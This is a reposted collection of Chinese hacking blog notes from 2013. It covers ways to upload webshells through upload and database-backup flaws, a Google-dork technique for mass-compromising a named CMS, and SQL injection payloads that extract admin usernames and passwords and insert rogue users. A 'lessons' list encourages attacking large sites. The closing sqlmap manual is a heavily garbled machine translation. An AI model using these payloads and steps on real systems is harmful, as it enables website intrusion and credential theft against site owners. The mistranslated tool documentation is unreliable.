版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、上传漏洞总结(2013-11-10 15:11:13) 转载分类: 那些事儿 1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a,一般就能逃过拦截系统了。3.上传图片木马把地址复制到数据库备份里备份成asp木马,有时不成功就利用IIs6.0解析漏洞尝试突破。4.上传图片木马再用抓包工具进行抓包,用明小子的综合上传功能,复制上传地址及cook
2、ies填到对应的框里,点击上传即可。 5.当后台有数据库备份蛋没有上传点时,把一句话木马插到任意处,再到数据库备份里备份成asp木马,之后用一句话客户端连接木马即可。 6.后台点击修改密码,新密码设置为:1:eval request(“h”)设置成功后连接asp/config.asp即可拿下shell7.当页面提示“上传格式不正确重新上传” 则说明存在上传漏洞,复制地址放到明小子里上传,一般都能直接拿下shell。8.当后台没有数据库备份但有数据库恢复的情况下,请不要犹豫,数据库恢复跟数据库备份功能是一样的,直接邪恶吧。9.如果知道网站的数据库是asp的,直接在前台找留言板插入一句话木马,连接
3、配置文件inc/config.asp即可拿下shell。10.当网站前台有“会员注册” 注册一个账户进去看看有没有上传点,有的话直接上传asp木马以及利用iis6.0解析漏洞,不行就抓包用明小子上传。11.先上传一个.ashx的文件,在笔记里搜索可找到方法,结果是访问会生成一句话木马文件,后台上传、编辑器上传、上传漏洞页面均可使用此方法。12.当页面提示只能上传jpg|gif|png等格式的时候,右键查看源文件,本地修改为asp|asa|php再本地上传即可拿下shell。13.当用啊D检测注入点提示SA权限或DB权限的时候,尝试列目录找到网站物理路径,再点击cmd/上传,直接上传asp木马即
4、可,不行就差异备份拿shell。14.对于一些上传漏洞的上传页面,以及后台找到的上传页面,可以尝试用本地双文件上传突破,第一个选jpg第二个选cer,推荐使用火狐浏览器。详解蓝科CMS漏洞批量拿shall(2013-11-10 16:04:36) 转载分类: 那些事儿 关键词: inurl:recruitment/mail_job.asp漏洞页面: admin/left.asp利用关键词搜索一下,出来很多结果。随便进入一个网站后,在网站后面加上admin/left.asp直接进入了后台。首先要把浏览器的安全性设置一下点击工具Internet选项 如下图:添加一个用户用户添加完后再把浏览器的安全
5、性区域级别设置回来,设置为默认就行了。刷新页面后,会出来网站后台登录的地方,然后用刚才添加的用户登录进去后,下面就开始拿shell了,拿shell方法很简单直接用数据备份。分享: 0喜欢浅谈ASP,PHP入侵那些事儿(2013-11-10 16:14:31) 转载分类: 那些事儿 简单判定有无漏洞:粗略型:1. 数字型:and 1=1 and 1=22.字符型: and 1=1 and 1=23.搜索型:% and 1=1 and %=% 或者 % and 1=2 and %=%(PS:第三个大家可能不常用,他一般在ASP脚本中一般写成:keyword=request(”keyword”),赋
6、值“KYO”到SQL语句中的时候即变为Select * from 表名 where keyword like %KYO%)简单判断数据库信息:语句型(IIS报不报错,语句自己区分):and user0and (select count(*) from msysobjects)0 (页面错误为access数据库)and (select count(*) from sysobjects)0 (页面正常为MSSQL数据库)and db_name()0 (爆数据库名)version0 (爆SQLServer版本信息以及服务器操作系统的类型和版本信息)粗略型:加 (根据服务器报错的信息来判断)加 ;(;
7、和MSSQL数据库里面一般都有, ; 表示分离, 则是注释符ACCESS数据库里没有)判断MYSQL权限:and 0(Select ISSRVROLEMEMBER(sysadmin)(页面正常则为SA)and 0(Select IS_MEMBER(db_owner)(页面正常则为db_owner)and 0(Select IS_MEMBER(public)(页面正常则是public)PS:以上方法适用于参数是int的时候,若为字符型,需在参数后添加和查询语句后添加;开始进行SQL注入(ACCESS):猜解表名:and 0(select count(*) from 表名) 或and exists
8、(Select * from 表名)and 1N (TOP表示把最前面的一条记录提取出来;N为变换猜解的列长度,页面错误即说明该列长度为N)如:and 1=(select count(*) from user where len(name)6) 错误and 1=(select count(*) from user where len(name)5) 正确则长度是6猜解用户名和密码:and (select top 1 asc(mid(列名,1,1) from 表名)0如:and (select top 1 asc(mid(user,1,1) from name)96页面正常and (select
9、 top 1 asc(mid(user,1,1) from name)97页面错误则ASCLL码为97PS:因为MD5的密文只有16,18,32,40这几个,所以猜解密码的时候只要试一试15,16,17,18,31,32,39,40等就简单些。开始进行SQL注入(MYSQL):爆出表名和字段: having 1=1插入新记录: group by users.ID having 1=1group by users.ID, users.username, users.password, users.privs having 1=1; insert into users values( 666, a
10、ttacker, foobar, 0xffff )猜解表名:and (select top 1 name from sysobjects where xtype=u)0 (获得第一个表名)and (select top 1 name from sysobjects where xtype=u and name not in (user)0(获得第二个表名)猜解列名:and (select top 1 col_name(object_id(字段),1) from sysobjects)0(得到字段的第一个列名)猜解字段内容:and (select top 1 列名 from 表名)0如:and
11、(select top 1 username from admin)0 (获取用户名)and (select top 1 password from admin)0 (获取密码)导出webshell:1.利用SQL执行命令功能导出WebShell:SELECT 分享: 0喜欢渗透笔记(2013-11-13 13:09:52) 转载分类: 转载 安全研究室的小编们带来,主要为一些短小但又精华的渗透小技巧,这些技巧都是由小编们在平时读书、学习的时候积累的一些小技巧,初定为每周更新一次。为保证质量,每一篇为20条左右的渗透小记。同时欢迎其他同学们投稿给我们你的笔记与大家分享 1、避免0day攻击的最
12、好办法是实现启发式(Heuristic)或基于轮廓(Profile-based)的入侵检测系统。2、常见的安全证书包括CCIE: Security、CEH、CISSP、CCSP、GIAC、OPSTA和Security+。3、Nmap扫描主机开放端口,能够在运行IPSec的OpenBSD 2.7 系统上引发DOS攻击。当使用-sO选项运行Nmap时,就会引起OpenBSD系统奔溃。4、现在已知端口扫描能够在下述环境中引发DOS攻击:Efficient Networks Routers、pcAnywhere9.0、安装了Novell intraNetWare Client的Windows 95/9
13、8。5、湿件(Wetware),湿件就是计算机中人类的因素。6、被动侦查:用户组会议、Web网站上的信息、Edgars数据库、社工库、UUNet新闻组、商业伙伴、垃圾搜索、社会工程学;主动侦查:端口扫描、DNS查询、区域传输、ping扫描、路由跟踪、OS特征检测7、端口扫描的几种类型:TCP Connect()扫描、SYN扫描、NULL扫描、FIN扫描、ACK扫描、Xmas-Tree扫描、Dumb扫描、Reverse Ident扫描8、灰箱测试(Gray-Box):测试人员模拟内部雇员。他们得到了一个内部网络的账号,并且拥有了访问网络的标准方法。这项测试用于评估来自企业内部职员的攻击。9、在n
14、etcat中,经常使用53端口监听的原因是:这个端口号是分配跟DNS使用的,通常防火墙开放这个端口。如果选择其他不常用的端口,那么防火墙可能会阻断这些端口的流量。10、盲注的核心语句: 1php?id=1 and (select ord(mid(group_concat(SCHEMA_NAME),20,1) from information_schema.schemata)011、VLAN 跳跃攻击利用了DTP。在VLAN跳跃中,将我们的计算机伪装为另一个交换机。我们发送一条伪造的DTP协商消息,声明我们希望进行帧中继。当真实交换机接到我们的DTP消息之后,它就会认为它应该转到802.1Q中继
15、。当转入中继状态之后,发自所有VLAN的所有流量都发送到你的计算机上。12、VTP攻击:在被攻击网络上连接一台交换机,然后在新增交换机和黑客的计算机之间建立中继连接。之后,恶意黑客向交换机发送一条VTP消息,该消息的配置修订号大于当前VTP服务器上的配置修订号,但不配置VLAN。这样,所有的交换机都与恶意黑客的计算机进行同步,从而在他们的VLAN数据库中删除所有非默认的VLAN(当然,你要撞对VTP password。)13、 在ACK扫描中,TCP数据包被发送到每一个端口,数据包设置了ACK位。防火墙通常会对未过滤的端口作出响应,他的响应是一个设置了RST位的TCP数据包。绝大多数的防火墙对
16、过滤掉的端口不作出响应。通过记录从防火墙返回的RST数据包,我们就可以评估运行在防火墙后面网络中的服务是什么服务。14、如果防火墙开放ICMP端口(可ping、traceroute),可以利用Loki ICMP隧道技术来穿透,这种类型的隧道技术让我们能够在ICMP Echo数据包的数据部分承载一个后门应用。15、ICMP隧道、ACK隧道和HTTP隧道穿透技术是三种穿越防火墙而不被检测到的技术。16、规避基于特征类型的IDS,常用的两种方法是:加密和利用转换(Exploit Mutation)。其中加密通信我们可以利用NetCat的一个加密版本NCrypt来实现。17、恶意黑客通过向路由器发送大
17、量的CDP帧,能够摧毁或重启运行版本早于12.2(3)的Cisco IOS Software的路由器。要发送多个CDP帧,可以利用基于Linux的CDP Sender工具。18、思科路由器的两种使能模式加密命令:enable password 【密码】 和 enable secret 【密码】,区别在于:在第一种加密中,口令以明文的形式存储在配置中。通过在全局配置提示符下输入命令service password-encryption,可以使用类型7加密方式加密口令。在第二种加密中,口令使用类型5加密方法进行加密。19、Boson RIP Route Generator 可以模拟网络上的路由器,
18、并让我们能够注入伪造网络和配置的跳计数,以实现路由器注入技术(可以实现路由欺骗技术)。分享: 0喜欢必须记住的经验(出自凡叔)(2013-11-13 16:51:59) 转载分类: 那些事儿 1、不要相信工具,啊D、明小子、ZBSI,在我前边的课程演示中都出过错,所以,工具是死的,人是活的,不要过于相信工具,也不要过于依赖工具。2、思路不要太死板,想到什么就去试试,你会有意想不到的收获不要看到大网站就不敢下手,我前边搞了21cn,搞了人民网,搞了12321,都是大网站,它们也是有可能存在注入的,所以不要不敢下手。3、在开始对一个网站检测之前,先找找后台在哪,如果实在找不到后台,那建议放弃,如果
19、找到了后台,那就先试试弱口令,有相当一部分的网站后台具有弱口令,如果没有弱口令,那再从前台下手也不迟,记住,弱口令永远是你通往后台的最迅速的办法。4、如果实在找不到后台,不妨试试robots.txt和google hack,虽然成功的几率不大,但是有胜于无。5、如果你猜到了表名后猜不到字段名,那么不妨去看看后台登录界面的源码,一般登录框的name值就是数据库中的字段名,如:.hk/admin/index.php它的源码片段如下:登入名稱:密碼:而在上一节课的实战中,我们最终查出的字段就是这两个字段。6、如果实在拿不到管理员的用户名和密码,不妨试试直接访问后台
20、页面,具体的例子你可以看看这里:7、如果主站实在拿不下,那就旁注吧。8、不同的DNS服务器,查出的同IP的网站数量是不一样的,一般的,这个网站查出的比较全面:9、如果不是有特殊原因,最好不要给人挂黑页,那是一种不道德的行为,大多数时候,在留个html或者txt上去,证明你来过,就行了。10、如果你进到了后台,但是无法拿到webshell,那就截个图留念一下就好了,不要利用后台的权限去修改、删除别人的新闻,那只能说明你的无知,如果你真的修改了,最好不要在新闻里写上你的名字,否则同行看到了会笑话你的。11、编辑器永远是你通往webshell的最好用的路径。12、不要只看动画教程而对文章不屑一顾,拿
21、站这种事,在动画里是说不清楚的,而文章却能把它说的清清楚楚的。13、你要有耐心,我见过一个页面80多个字段的,那就得一个一个的猜,比如:.hk/news_detail.php?id=164这个页面的数据库里,一共有34个表段,我查表就查了34次。不要厌烦,要有耐心。14、注重实践,经验在拿站这方面很重要。15、你最好学学脚本,HTML永远都是基础,VBS是辅助,JAVASCRIPT需要熟悉,ASP、PHP、JSP,这3样必须得会一样。16、不要怕难,想学就去学吧,慢慢的你就会了。17、我教你的这些,在拿站界只是皮毛,千万不要妄自尊大,你我需要学习的都还有很多
22、,多看看别人的检测过程,我们是总能学到东西的。18、多实战、多总结、多读书。完毕。分享: 0喜欢ashx脚本写入脚本文件拿webshell(2013-11-15 23:39:57) 转载分类: 那些事儿 如果后台过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:分享: 0喜欢SQLMAP注射工具用法(2013-11-21 13:22:33) 转载分类: 那些事儿 SQLMAP 注射工具用法SQLMAP注射工具用法1。介绍1.1要求1.2网应用情节1.3SQL射入技术1.4特点1.5下载和更新sqlmap1.6
23、执照2。用法2.1帮助2.2目标URL2.3目标URL和verbosity2.4URL参量2.5Googledork2.6HTTP方法:得到或张贴2.7张贴的数据串2.8HTTP曲奇饼倒栽跳水2.9HTTP用户代理倒栽跳水2.10任意HTTP用户代理倒栽跳水2.11HTTP认证2.12HTTP代理人2.13串比赛2.14遥远的数据库管理系统2.15广泛的DBMS指印2.16横幅2.17当前的用户2.18当前的数据库2.19数据库用户2.20数据库用户密码hashes2.21可利用的数据库2.22数据库桌2.23数据库桌专栏2.24转储数据库制表词条2.25转储整个DBMS2.26检索文件内容2
24、.27处理您自己的表示2.28检查联合询问SQL射入2.29利用联合询问SQL射入2.30估计的到达时间2.31之外所有数据被检索在文本文件2.32简历询问价值从文本文件3。参考4。接触-1。介绍sqlmap是一个自动SQL射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印,检索遥远的DBMS数据库,usernames,桌,专栏,列举整个DBMS,读了系统文件和利用导致SQL射入弱点的网应用编程的安全漏洞。有许多其它SQL射入工具在网,但我不能发现任何人适合所有我的需要因此我感到需要在我的渗透测试期间给成功地写我自己的工具测试,辨认和利用网应用的SQL射入在安全上的弱点。1.1要求sql
25、map整个地被开发在Python,一个动态面向对象的被解释的编程语言。这由操作系统使工具独立。sqlmap实际上依靠只自由地是下载的从它的正式站点的Python口译员。做它更加容易,许多GNU/Linux发行从箱子出来以Python包裹preinstalled并且其它 Unices提供这个解释语言precompiled入他们的包裹格式。如果您使用窗口或MacOSx那里存在precompiled设定准备好正式可执行在Python站点。1.2网应用情节我们说您验核网应用的安全并且您发现了接受动态用户提供价值对它得到并且/或者张贴参量的一个网页。您现在想要测试如果这些是脆弱的对SQL射入弱点,如果那
26、样,剥削他们检索同样多信息尽可能在网应用的数据库管理系统外面甚至能读任意文件从数据库管理系统计算机如果网页是:7/page.php?id=1&cat=2假定:7/page.php?id=1+AND+1=1&cat=2和原始一个一样是页和:7/page.php?id=1+AND+1=2&cat=2与它意味的原始的产品不同我们是在一个SQL射入弱点前面在id意味网应用index.php页的得到参量IDS/IPS,没有网应用防火墙,没有参数值sanitization不执行在服务器边亦不PHP口译员边
27、。这是相当共同的缺点在动态美满的网应用并且它不取决于遥远的DBMS或在网应用语言,这是程序员代码的安全漏洞。开放网应用安全项目最近对在他们的OWASP名列前茅十这个弱点估计作为最共同和最重要的网应用弱点,其次唯一十字架站点Scripting问题。回到情节,statemenetSELECT入大概index.php有句法相似与以下SQL询问在冒充的PHP:$query=SELECTFROMWHEREid=.$_REQUESTid;如此,如同您能看,添附其他syntatically合法的SQL情况在a(之后合法的)价值为id这样的情况将发生当网应用执行询问在附上DBMS,所以情况id=1AND1=1
28、和原物一样是合法的(真实)并且退回页,以同样内容和没有任一个古怪的SQL错误信息。更多,在这个例子它会是还可能添附,不仅一个或更多合法的SQLcondition(s),而且其他完全SQL询问,请求某事象在伪码id=1;ANOTHERSQLQUERY-即然我们发现了这个SQL射入脆弱的参量,我们能利用它操作id参数值。通过原始的地址,7/page.php?id=1&cat=2对 sqlmap,工具自动地将辨认脆弱的参量(id在这个情节)并且将添附syntatically合法的SQL声明串包含SELECT次级声明或我们想要检索产品的其他声明。由做比较根据超文字标记
29、语言页hashes,串或每被请求的页与原始一个,sqlmap正则表达式比赛确定声明字符的产品价值将由字符,这个技术作为盲目的SQL射入的名字和很好被描述在许多文件里,检查参考部分有些技术文章。1.3SQL射入技术与二等分算法被实施在sqlmap执行这攻击以盲目的SQL射入著名这达到以大约七个HTTP请求每产品的各个字符,但如果网应用页代码解析声明的产品SELECT入afor或相似的周期以便询问产品的各条线打印在页内容,我们是在一个inbandSQL射入弱点,亦称联合询问SQL射入弱点前面。我强烈劝告您跑至少一旦sqlmap以-union-check命令行选择到测试如此和如果用途-union-
30、use命令行选择利用这个弱点因为它保存得很多时间并且它不衡量在网络服务器记录文件下以上百HTTP请求。1.4特点这主要特点名单被实施在sqlmap:完全支持为MySQL、Oracle、PostgreSQL和微软SQL服务器数据库管理系统后端。除这些四以外DBMS,sqlmap可能并且辨认微软通入、DB2、Informix和Sybase;广泛的数据库管理系统后端指印根据:InbandDBMS错误信息DBMS横幅解析DBMS起作用产品比较DBMS具体特点譬如MySQL评论射入被动SQL射入fuzzing它充分支持二个SQL射入技术:盲目的SQL射入,亦称推断SQL射入InbandSQL射入,亦称联
31、合询问SQL射入并且它部份地支持错误基于的SQL射入作为传染媒介的当中一个为数据库管理系统指印;它自动地测试所有被提供得到,张贴,曲奇饼和用户代理参量发现动态那些。在这些它测试和自动地查出那个通过SQL射入影响。而且各个动态参量被测试为数字,选拔引证串,加倍引证串和所有这些三型以一个和二个托架发现哪些是合法的句法进行进一步射入与;它是可能提供唯一的parameter(s)的名字,您想要执行测试并且用途为射入,是他们得到,张贴,曲奇饼参量;SQL射入测试和侦查不取决于网应用数据库管理系统后端。SQL射入剥削和询问句法明显地取决于网应用数据库管理系统后端;它认可合法的询问由假那些根据HTML产品页
32、hashes比较,但它是还可能选择执行这样的测试根据串匹配;HTTP请求可能执行在HTTP方法GET和POST(缺省:GET);它是可能执行HTTP请求使用HTTPUser-Agent倒栽跳水串从文本文件任意地被挑选;它是可能提供HTTPCookie倒栽跳水串,有用当网应用要求认证根据曲奇饼并且您有这样数据;它是可能提供一个匿名HTTP代理人地址和口岸对通行证由HTTP请求对目标URL;它是可能提供遥远的DBMS后端如果您已经知道它做sqlmap之外某个时候指印它;它支持各种各样的命令行选择得到数据库管理系统横幅,当前的DBMS用户,当前的DBMS数据库,列举用户,密码hashes的用户,数据
33、库,桌,专栏,转储制表词条,倾销整个DBMS,检索一个任意文件内容(如果遥远的DBMS是MySQL)并且提供您自己的SQL精选的声明被评估;它是可能自动地做sqlmap查出如果受影响的参量通过联合询问SQL射入并且影响并且,在这样的案件,使用它利用弱点;它是可能排除系统数据库当列举桌,有用当倾销整个DBMS数据库桌词条并且您想要跳缺省DBMS数据;它是可能观看估计的到达时间为各询问产品,被更新在实时当进行SQL射入攻击;支持增加产品消息的verbosity水平;它是可能保存询问执行和他们的被检索的价值在实时在产品文本文件和继续射入恢复从这样的文件在第二次;PHP设置magic_quotes_g
34、pc旁路由输入每询问串,在单引号之间,以CHAR(或相似)DBMS具体作用。1.5下载和更新sqlmap这个指南是sqlmap的一部分。您应该接受了它当您下载了sqlmap。sqlmap可能被下载从它的SourceForge文件名单页和发展发行从可能冲浪以浏览器或被获取对下载sqlmap的它的SourceForge颠覆贮藏库:$svncheckoutsqlmap任何方式您下载了sqlmap,奔跑svnupdate在它的根目录(有主文件的地方sqlmap.py)与SVN贮藏库同步检索它的原始代码更新在您运作的拷贝保证,您跑节目的最新的版本。关于SourceForge颠覆贮藏库用法的详细信息可能被
35、发现这里。1.6执照sqlmap被发布在公众执照v2条件下。2。用法唯一的二个可能的必须的参量是:-u或-url:选拔目标URL测试,查出和注射对于SQL射入缺点-g:测试所有Google结果寻找一位具体Googledork这些是唯一的二命令行参量排除eachother。跟随sqlmap命令行参量和价值被解释在细节以一个例子为各个参量。2.1帮助$pythonsqlmap.py-hsqlmap/X.YcodedbyinquisandbelchUsage:sqlmap.pyoptions-u|-gOptions:-h,-helpshowthishelpmessageandexit-uURL,-u
36、rl=URLtargeturl-pTESTPARAMETERspecifythetestableparameter(s)-gGOOGLEDORKratherthanprovidingatargeturl,letGooglereturntargethostsasresultofyourGoogledorkexpression-method=HTTPMETHODHTTPmethod,GETorPOST(default:GET)-data=DATAdatastringtobesentthroughPOST-cookie=COOKIEHTTPCookieheader-user-agent=UAGENT
37、HTTPUser-Agentheader-aUSERAGENTSFILEloadarandomHTTPUser-Agentheaderfromfile-basic-auth=BAUTHHTTPBasicAuthentication,value:username:password-digest-auth=DAUTHHTTPDigestAuthentication,value:username:password-proxy=PROXYuseaproxytoconnecttothetargeturl-string=STRINGstringtomatchinpagewhenthequeryisvali
38、d-remote-dbms=DBMSperformchecksonlyforthisspecificDBMS-f,-fingerprintperformanexaustivedatabasefingerprint-b,-bannergetDBMSbanner-current-usergetcurrentDBMSuser-current-dbgetcurrentDBMSname-usersgetDBMSusers-passwordsgetDBMSuserspasswordhashes-dbsgetavailabledatabases-tablesgetdatabasetables(optiona
39、l:-D)-columnsgettablecolumns(required:-Tand-D)-dumpdumpdatabasetableentries(required:-Tand-Doptional:-C)-dump-alldumpalldatabasestablesentries-file=FILENAMEreadaspecificfilecontent-eEXPRESSIONexpressiontoevaluate-union-checkcheckforUNIONSELECTstatement-union-useusetheUNIONSELECTstatementtoretrieveth
40、equeriesoutput-DDB,-database=DBdatabasetoenumerate-TTBL,-table=TBLdatabasetabletoenumerate-CCOL,-column=COLdatabasetablecolumntoenumerate-exclude-sysdbsexcludesystemdatabaseswhenenumeratingtables-etaretrieveeachquerylengthandcalculatetheestimatedtimeofarrival-vVERBOSEsetverbositylevel(0-2),defaultis
41、0-oOUTPUTFILEsavealldataretrievedonatextfile-r,-resumeresumequeriesvaluefromatextfile2.2目标URL命令行选择:-u或-url跑sqlmap在唯一目标URL:$pythonsqlmap.py-u7/page.php?id=1&cat=2remoteDBMS:MySQL=5.0.02.3目标URL和verbosity命令行选择:-v絮絮叨叨的选择可能使用设置产品消息的verbosity水平。它的价值可能实际上是0,1或2。它的价值是0因为sqlmap不会打印任何新闻消息对标准产
42、品,只有询问产品和最后警告和错误如果他们发生。$pythonsqlmap.py-u7/page.php?id=1&cat=2-v1hh:mm:25INFOtestingiftheurlisstable,waitafewsecondshh:mm:26INFOurlisstablehh:mm:26INFOtestingifGETparameteridisdynamichh:mm:26INFOconfirmingthatGETparameteridisdynamichh:mm:26INFOGETparameteridisdynamichh:mm:26INFOtest
43、ingsqlinjectiononGETparameteridhh:mm:26INFOtestingnumeric/dinjectiononGETparameteridhh:mm:26INFOconfirmingnumeric/dinjectiononGETparameteridhh:mm:26INFOGETparameteridisnumeric/dinjectablehh:mm:26INFOtestingMySQLhh:mm:26INFOquery:CONCAT(5,5)hh:mm:26INFOretrieved:55hh:mm:26INFOperformed20queriesin0sec
44、ondshh:mm:26INFOconfirmingMySQLhh:mm:26INFOquery:LENGTH(5)hh:mm:26INFOretrieved:1hh:mm:26INFOperformed13queriesin0secondshh:mm:26INFOquery:SELECT5FROMinformation_schema.TABLESLIMIT0,1hh:mm:26INFOretrieved:5hh:mm:26INFOperformed13queriesin0secondsremoteDBMS:MySQL=5.0.02.4URL参量命令行选择:-psqlmap测试全部得到并且岗位
45、为dynamicity和SQL射入弱点提供了参量,但它手工是可能的对specificy您要sqlmap执行对逗号的测试separeted为了未参加dynamicity测试和执行SQL射入测试的URLparameter(s),侦查和剥削只在被提供的 parameter(s):$pythonsqlmap.py-u7/page.php?id=1&cat=2-v1-pidhh:mm:17INFOtestingiftheurlisstable,waitafewsecondshh:mm:18INFOurlisstablehh:mm:18INFOtestingsqlinje
46、ctiononparameteridhh:mm:18INFOtestingnumeric/dinjectiononparameteridhh:mm:18INFOconfirmingnumeric/dinjectiononparameteridhh:mm:18INFOparameteridisnumeric/dinjectable.或如果您想要提供超过一个参量,例如:$pythonsqlmap.py-u7/page.php?id=1&cat=2-v1-pcat,id2.5Googledork命令行选择:-g而不是提供目标URL它是还可能执行对参量的测试在地址由G
47、oogledork查寻返回。这个选择做sqlmap与搜索引擎谈判它的会议曲奇饼能执行查寻,那么sqlmap将检索Google第一个100个结果为表示与得到参量问您的Googledork如果您想要测试和得到SQL射入好处在各可能的受影响的URL。$pythonsqlmap.py-gsite:inurl:example.php-v1hh:mm:38INFOfirstrequesttoGoogletogetthesessioncookiehh:mm:39INFOsqlmapgotPREF=ID=xxxxxxxxxxxxxxxx:TM=yyyyyyyyyy:LM=zzzzzzzzzz:S=wwwwwwwwwwwwwwwwassessioncookiehh:mm:40INFOsqlmapgot65resultsforyourGoogledorkexpression,59ofthemaretestablehostshh:mm:40INFOurl1:hh:mm:43INFOurl3:hh:mm:42INFOurl2:hh:mm:44INFOtestingurlhh:mm:45INFOtestingiftheurlisstable,waitafewsecondshh:mm:49INFOurl
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2026广东省源天工程有限公司选聘经营部副总经理1人笔试历年参考题库附带答案详解
- 2026华丞电子校园招聘笔试历年参考题库附带答案详解
- 2026中国电信天翼视联校园招聘启动笔试历年参考题库附带答案详解
- 2025重庆庆铃日发座椅有限公司招聘5人笔试历年参考题库附带答案详解
- 2025四川经纬教育管理集团有限公司下属子公司招聘2人笔试历年参考题库附带答案详解
- 2025-2026中国电力工程顾问集团东北电力设计院有限公司招聘笔试历年参考题库附带答案详解
- 2026浙江杭州淳安千岛湖億美医院有限公司招聘5人备考题库含答案详解(巩固)
- 2026年齿轮加工外包协议(新能源)
- 安徽涉外经济职业学院《老年病学》2025-2026学年期末试卷
- 长治医学院《药事法规》2025-2026学年期末试卷
- 泵站设备运行维护工作报告
- 科技金融新质生产力会议
- 2025年五类人员考试真题及答案
- 机械识图基础知识
- 市政道路施工方案投标文件(技术方案)
- 淄博家乡介绍课件
- ECMO最常见的并发症及防治策略
- 水产养殖产业链分析-洞察阐释
- 《矿图》教学课件
- 2025年B站OTT大屏营销通案
- 远程审方管理制度
评论
0/150
提交评论